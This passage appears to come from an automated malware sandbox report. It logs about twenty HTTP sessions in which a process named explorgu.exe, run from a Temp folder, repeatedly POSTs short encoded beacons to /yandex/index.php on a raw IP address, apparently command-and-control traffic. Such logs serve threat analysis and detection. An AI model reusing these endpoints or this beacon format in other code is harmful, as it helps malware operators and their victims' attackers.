                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:08 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            80192.168.2.449817185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:09.197949886 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:09.439465046 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            81192.168.2.449818185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:10.866785049 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:11.116601944 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:10 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            82192.168.2.449819185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:11.483071089 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:11.723150969 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:11 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            83192.168.2.449820185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:11.966398001 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:12.210057974 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:12 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            84192.168.2.449822185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:12.571186066 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:12.812608004 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:12 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            85192.168.2.449823185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:13.172774076 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:13.419527054 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            86192.168.2.449824185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:13.437999010 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:13.687391043 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            87192.168.2.449825185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:14.047039032 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:14.294979095 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:14 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            88192.168.2.449827185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:14.672652960 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:14.919245005 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:14 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            89192.168.2.449828185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:15.169246912 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:15.419296026 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            90192.168.2.449830185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:15.797771931 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:16.047758102 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            91192.168.2.449831185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:16.427589893 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:16.674082994 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            92192.168.2.449832185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:16.924141884 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:17.175612926 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            93192.168.2.449833185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:17.523293972 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:17.761698008 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            94192.168.2.449834185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:18.001214981 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:18.241485119 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:18 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            95192.168.2.449835185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:18.625744104 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:18.871079922 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:18 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            96192.168.2.449836185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:19.123364925 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:19.374160051 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:19 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            97192.168.2.449837185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:19.739500999 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:19.984765053 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:19 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            98192.168.2.449838185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:20.225928068 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:20.472418070 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:20 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            99192.168.2.449839185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:20.836400032 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:21.083137989 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:20 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            100192.168.2.449840185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
